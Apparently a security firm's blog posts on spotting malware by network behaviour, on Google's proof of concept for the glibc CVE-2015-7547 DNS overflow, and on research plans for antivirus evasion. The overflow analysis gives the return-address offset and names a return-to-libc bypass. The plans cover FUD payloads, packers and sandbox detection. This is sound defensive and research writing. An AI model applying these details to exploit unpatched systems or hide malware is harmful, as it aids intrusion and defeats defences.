There are also indicators coming out from behavioural analysis. For example a malware which contacts a Command & Control server will ‘beacon’ in a timely (usually) fashion. This ‘beaconing’ behaviour can be identified by monitoring spikes of specific traffic or bandwidth utilisation of a host. Moreover it can be spotted by monitoring out-of-hours behaviour since a host shouldn’t send data except of X type (which is legit) or shouldn’t be sending any data at all.
Ransomware will encrypt all accessible filesystems/mounted drives and will ask (guess what!?) for money! Most likely it will be downloaded somehow or will be dropped by exploit kits or other malware. Sometimes it is delivered through email attachments (if mail administrator has no clue!). As stand-alone ‘version’ ransomware comes in portable executable (PE file) format. However variants of Cryptolocker are employing even PowerShell for doing so. In order to detect them we need a way to extract the files from the network dump. There are couple of tools that does this such as foremost but it is also possible to do it ‘manually’ through wireshark by exporting the objects. This assumes that the file transfer happened through an unencrypted channel and not under SSL.
Malware might serve many different purposes such as stealing data, utilizing bandwidth for DDoS, or used as a ‘dropper’ where a ransomware is pushed. One of the more concerning is turning a compromised host into a zombie computer. Fast flux malware have numerous IPs associated with a single FQDN whereas domain flux malware have multiple FQDN per single IP. The latter is not ideal for malware authors since this IP will be easily identified and traffic will be dropped (a bit more about ‘sinkhole‘ in the next paragraph!).
Assuming that we are after a fast flux malware that uses a C&C, then there are ways to locate the malware by looking for beaconing. Quite often these malware make use of DGAs (Domain Generation Algorithms) which basically hide the C&C IP behind a series of different domain names. Malware that uses DGA are actively avoiding ‘sinkhole’ which allows ISPs to identify the malicious IP (C&C) and leading to the ‘blackhole’ of the traffic, shunning the communication of the infected system with it.
An infected host will attempt to resolve (through DNS) a series of domain names acquired from the DGAs, This behaviour will lead to lots of ‘Non-Existent’ NX responses from the name server back to the infected machine. Monitoring the number of NX responses might help us identify infected systems. Moreover monitoring the DNS queries should also help.

In a latter post I will publish a small script that I am using for looking for IoC.

Main menu

Script under development 😉

 

CVE 2015-7547 glibc getaddrinfo() DNS Vulnerability

Posted by jstester007 on March 7th, 2016

Hello w0rld! JUMPSEC researchers have spent some time on the glibc DNS vulnerability indexed as CVE 2015-7547 (It hasn’t got a cool name like GHOST unfortunately…). It appears to be a highly critical vulnerability and covers a large number of systems. It allows remote code execution by a stack-based overflow in the client side DNS resolver. In this post we would like to present our analysis.

Google POC overview

1sts

Google POC Network Exploitation Timeline

draw-io_glibc (1)

Google POC Exploit Code Analysis

First response

 

test

Code snippet

 

alter1

Packet capture snippet

The dw() function calls a “struct” module from python library. According to the documentation, it performs conversion between python values and C structs represented as python strings. In this case, it interprets python integer and pack it into little-endian short type binary data. This is a valid response sent by the “malicious” DNS server when it receives any initial queries. This response packet is constructed intentionally in large size (with 2500 bytes of null), it forces the client to retry over TCP and allocate additional memory buffer for the next response. This also triggers the dual DNS query from getaddrinfo() on the client side, which is a single request containing A and AAAA queries concatnated.

 

Second Response

alter3

Code snippet

 

alter4

Packet capture snippet

This is the second response sent by the malicious DNS server. It is a malformed packet sending large numbers of “fake records” (184 Answer RRs) back to the client. According to google, this forces __libc_res_nsend to retry the query.

Third response

alter5

Code snippet

 

alter5b

Packet capture snippet

 

This is the third response sent by the “malicious” DNS server. It is another malformed packet which is carrying the payload. JUMPSEC researcher has modified the Google POC code to identify the the number of bytes to cause a segmentation fault (possibly overwriting the RET address) of the buffer. It is found that the RET address is being overwritten on the 2079th byte. With the addition of return_to_libc technique, an attacker can bypass OS protection such as NX bit or ASLR and perform remote code execution.

 

Google POC debugging and crash analysis

JUMPSEC has run it through the trusty gdb. It crashes with a SEGMENTATION FAULT which verifies that the DNS response has smashed the stack of the vulnerable client application when running getaddrinfo(). The vulnerable buffer is operated in gaih_getanswer. The entry address has been overwritten with 0x4443424144434241 (ABCDABCD). The state of the register also showing the overflowed bytes.

alter6

SEGFAULT from vulnerable client. RET address is overwritten with “ABCDABCD”

alter7

Backtrack

cropped

Registers

JUMPSEC has also tested it on a few other applications. It was found that the getaddrinfo() function in glibc is commonly used…

alter9

alter10

Iceweasel crashing

Conclusion

The best way to mitigate this issue is to enforce proper patching management. Make sure to update all your systems with the latest version of glibc . If you have any systems exposed on the internet and you want to make sure that this vulnerability is not triggered then the following Wireshark filter could be useful: (DNS.length>2048 to see malformed packets). A DNS response has a maximum of 512 bytes (typically), note that the DNS reply is truncated. Even if the client does not accept large response, smaller responses can be combine into a large one which can also trigger the vulnerability. A possible filter is to monitor the size of the entire conversation as a distinct amount of bytes in total is require to trigger specific responses from vulnerable client and all of them requires more than 2048 bytes.

The above vulnerability can be fixed by patching. If you are running RedHat or CentOS a simple

yum -y update glibc

will update the libc and resolve the issue (remember to restart the service right after the update!).

Reference links

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547

http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html

https://googleonlinesecurity.blogspot.co.uk/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html

https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html

 

Research and Development

Posted by XoN on January 28th, 2016

Hello w0rld. On this post we would like to let you know our areas of research and the research projects that we are working on currently. For 2016 we are planning to develop tools that will be used in our tests. Our areas of interest can be highlighted as:

  • AntiVirus Detection and Evasion techniques (sandbox detection, etc)
  • Packers, anti-debugging, anti-disassembly and binary obfuscation
  • Network packet capture analysis scripts looking for IoC

 

  • FUD Malware (maybe Veil Improvisation)

The initial idea is to find a way to create several different templates on top of Veil. Additionally we can implement several add-ons for Virtual Machine detection or Sandbox Environment detection. This can be either logical-based such as human interaction or can be through technical means like red pills. Even 2-3 assembly instructions can be used for identifying a sandbox environment.
Veil exports a .py file which is quite random. It randomizes variable names and also since it uses encryption it randomizes the key that will be used. Then it encrypts the payload and stores it in a .stub area on the binary. This area will be unfold after the execution and a routine is responsible for decrypting and launching the payload. This doesn’t offer and sandbox detection nor VM detection. It is heavily focused against AVs and specifically it is focused defeating signature-based detection systems.
The idea of having different binaries but still using the same payload (meterpreter) is necessary for pentesters and for generating quickly payloads that will be used in social engineering tasks.
Technically now the most important property is the large keyspace. The larger the key space the more ‘impossible’ to hit the same binary twice. Veil is providing that but still there are issues with the actual binary. My thought is to either break the exported binary and placed it under a new one OR just add several lines of code in the python script that will be used for compilation (through py2exe or pwninstaller). Another possibility is to mess around the pwninstaller and add things there. Another idea is to add randomisation on techniques defeating / escaping sandbox environments.
Things that are looking promising:

  1. Mess with the actual PE Header, things like .STAB areas, add more stab areas add junk data to stab areas or even add other encrypted data that might look interesting (hyperion paper also has a super cool idea…)
  2. Change the file size of the exported binary dynamically. This will happen assuming the above will happen. (Can also be randomized with NOP padding
  3. Change values that will not necessarily mess the execution (maybe the versioning of the PE? or the Entry point of the binary?)
  4. Write a small scale packer for performance and maybe add also VM detection there
  5. Employ sandbox detection and VM detection through several means (this also adds to the 2nd step)
  6. Randomized routines for sandbox detection (if mouse_right_click = %random_value then decrypt else break/sleep)

 

Implementation techniques will include ctypes for sandbox detection and adding loops or other useless things such as calculations. Also using ndisasm or pyelf for messing the binary it is suggested. Red pills can be used in several different techniques.

 

  • Packer

Another idea that JUMPSEC labs have is to develop their own packer. This will have several routines for:

  1. Static analysis obfuscation: Encryption
  2. Dynamic analysis obfuscation: Add noise in program flow/Add randomness to data/runtime
  3. Anti-debugging
  4. Sandbox escape: Detect human interactions

 

  • Network Analysis Scripts

We are developing several scripts for analysing pcap files. The purpose of these scripts is to parse packet captures and to identify whether there are IoC (Indicators of Compromise) by performing statistical analysis of the protocols usage and searching for potential protocol misuse (HTTP requests / responses that arent according to RFC).